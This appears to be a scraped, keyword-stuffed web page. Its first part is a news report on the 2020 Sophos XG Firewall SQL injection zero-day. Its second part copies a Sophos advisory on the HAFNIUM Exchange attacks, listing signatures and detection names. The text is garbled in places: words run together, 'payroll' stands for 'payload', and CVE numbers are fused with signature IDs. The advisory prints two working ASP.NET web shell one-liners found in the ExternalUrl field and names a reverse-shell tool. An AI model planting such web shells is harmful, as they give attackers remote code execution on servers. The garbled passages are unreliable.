Sophos Zero Day



Posted on April 26, 2020 at 2:48 PM

  1. Sophos Zero Day Review
  2. Sophos Zero Day Full
  3. Sophos Zero Day
  4. Sophos Zero Daytona
  5. Sophos Zero Day Client

Sophos patched a SQL injection flaw with XG Firewall product that exploited by attackers in the wild. Sophos informed about the bug on April 22, 2020, further analysis revealed that hackers can attack systems with either the administration interface (HTTPS admin service) or the user portal exposed on the WAN zone. Apr 26, 2020 Sophos has fixed a zero-day SQL injection vulnerability in their XG Firewall after receiving reports that hackers actively exploited it in attacks.

A cybersecurity firm Sophos has joined the long queue of victims who have had their networks compromised by hackers.

Yesterday, the company published a security update, which wasnecessary to patch its XG enterprise product zero-day vulnerability. It saidthe firewall product has been the subject of abuse by hackers.

Sophos revealed that it first discovered the zero-day vulnerability on Wednesday, after receiving an alert from one of its users. According to the user, the cybersecurity firm’s management interface was infected by a suspicious field value.

During the investigation, Sophos realized that thesuspicious field value was not an error but an actual attack on its server.

Hacker stole passwords by abusing an SQL injection bug

Sophos revealed that the hackers gained access to exposeXG devices using SQL injection vulnerabilities.

They infiltrated the Sophos XG firewall systems and exposedthe User Portal control panel, as well as the firm’s HTTPS service.

Sophos also reiterated that the cybercriminals took advantage of the SQL injection weakness and downloaded a payroll on the system. After downloading the payroll, it stole the files from the XG firewall.

According to the security firm, the compromised dataincluded hashed passwords and usernames of user accounts used for accessing thedevice, firewall portal admins, as well as for the firewall device.

Apart from these infected details, customers’ passwords forauthentication systems such as LDAP or AD were also compromised.

The security firm pointed out that while investigating, noevidence suggests the attackers accessed the XG firewall devices using thestolen passwords. It also did not find out any infringements on customers’internal networks or compromise beyond the firewall.

Sophos said updates have been sent to customers

The UK security firm, renowned for its popular antivirusproducts, disclosed that it has already sent the update to its customers topatch up the vulnerabilities. The automatic update will provide patches to allthe XG firewalls that enable the auto-update feature.

Sophos said with the updated server, there won’t be furtherexploitations on the device. It said the hotfix fix prevented the XG firewallfrom any access to the attacker infrastructure and stopped further infiltrationof the devices.

“This hotfix eliminated the SQL injection vulnerability which prevented further exploitation, the security firm said.

In addition to the updates, a unique box will be added tothe XG firewall control panel, which will inform the customers whether theirdevice has been infiltrated.

Recommendations for affected customers

Sophos has also recommended solutions for customers who hadtheir devices hacked. The processes included rebooting their devices andresetting their passwords. It said the hackers will no longer have access tothe devices if the companies reboot their devices and reset the passwords.

Even though the compromised records contain rehashedaccounts, Sophos is recommending that customers should reset passwords forthose accounts where the XG account could have been utilized.

Although the passwords were hashed, it is recommended thatpasswords are reset for any accounts where the XG credentials might have beenreused

Furthermore, the security firm recommended that companieswho don’t need the internet-facing ports feature should disable the firewalladministration interface. It has further provided instructions to disable this interface on itsofficial report on the hacking incident.

Sophos is a security software and hardware firm which develops top security products for unified threat management, mobile security, email security, network security, encryption, and communication endpoint.

The company recently introduced its new security productSophos Intercept X, which combines four important critical components toprovide security to its customers.

The recent attack on its systems shows the level hackers are going to infiltrate companies. And if the cybercriminals can compromise tech companies like Facebook and Twitter, and now a cyber threat security company, it shows they are capable of compromising any system.

As a result, organizations have been advised to beef uptheir security systems and apply updates as quickly as possible to keep theirnetwork and data secure and protected.

Sophos says Hackers have Compromised its Firewall Zero-Day
Description
Sophos revealed that it first discovered the zero-day vulnerability on Wednesday, after receiving an alert from one of its users. According to the user, the cybersecurity firm’s management interface was infected by a suspicious field value.
Sophos zero days
Author
Koddos
Sophos zero day vulnerability
Publisher Logo

Related Stories:

Apr 23, 2021
Apr 22, 2021

Four new zero-day vulnerabilities affecting Microsoft Exchange are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.

Sophos Zero Day

Anyone running on-premises Exchange Servers should patch them without delay, and search their networks for indicators of attack.

Sophos protections against HAFNIUM

Sophos MTR, network and endpoint security customers benefit from multiple protections against the exploitation of the new vulnerabilities.

Sophos MTR

The Sophos MTR team has been monitoring our customer environments for behaviors associated with these vulnerabilities since their announcement. If we identify any malicious activity related to these vulnerabilities, we will create a case and be in touch with you directly.

Sophos Firewall

Sophos Zero Day

IPS signatures for customers running SFOS and XFOS:

CVESID
CVE-2021-2685557241, 57242, 57243, 57244, 2305106, 2305107
CVE-2021-2685757233, 57234
CVE-2021-2685857245, 57246
CVE-2021-2706557245, 57246

These signatures are also present on the Endpoint IPS in Intercept X Advanced.

IPS signatures for customers running Sophos UTM:

Sophos Zero Day Review

CVESID
CVE-2021-2685557241, 57242, 57243, 57244
CVE-2021-2685757233, 57234
CVE-2021-2685857245, 57246
CVE-2021-2706557245, 57246

If you see these detection names on your networks you should investigate further and remediate.

Sophos Zero Day Full

Sophos Intercept X Advanced and Sophos Antivirus (SAV)

Customers can monitor the following AV signatures to identify potential HAFNIUM attacks:

Web shell related

  • Troj/WebShel-L
  • Troj/WebShel-M
  • Troj/WebShel-N
  • Troj/ASPDoor-T
  • Troj/ASPDoor-U
  • Troj/ASPDoor-V
  • Troj/AspScChk-A
  • Troj/Bckdr-RXD
  • Troj/WebShel-O
  • Troj/WebShel-P

Other payloads

  • Mal/Chopper-A
  • Mal/Chopper-B
  • ATK/Pivot-B
  • AMSI/PowerCat-A (Powercat)
  • AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Due to the dynamic nature of the web shells, the shells are blocked but need to be removed manually. If you see these detection names on your networks you should investigate further and remediate.

We have also blocked relevant C2 IP destinations, where it was safe to do so.

In addition, the “lsass dump” stages of the attack are blocked by the credential protection (CredGuard) included in all Intercept X Advanced subscriptions.

Sophos EDR

Sophos EDR customers can leverage pre-prepared queries to identify potential web shells for investigation:

When reviewing the potential web shells identified by the queries, the web shell will typically appear inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field. E.g.

ExternalUrl : http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“key-here”],”unsafe”);}</script>

ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“error.aspx”));}}</script>

Identifying signs of compromise

The Sophos MTR team has published a step-by-step guide on how to search your network for signs of compromise.

Sophos Zero Day

DearCry ransomware

The actors behind DearCry ransomware are using the same vulnerabilities as the Hafnium group in their attacks. Sophos Intercept X detects and blocks Dearcry via:

  • Troj/Ransom-GFE
  • CryptoGuard

Sophos Zero Daytona

Editor note: Post updated with addition of IPS signatures for Sophos UTM and additional detections. 2021-03-10 08:35 UTC

Editor note: Post updated with additional anti-malware signatures for Intercept X and Sophos Antvirus (SAV) 2021-03-11 14:30 UTC

Editor note: Post updated to advise that signatures are now present on the Endpoint IPS, and the addition of two further AV signatures 2021-03-12 09:10 UTC

Sophos Zero Day Client

Editor note: Post updated with DearCry ransomware detections 2021-03-12 16:30 UTC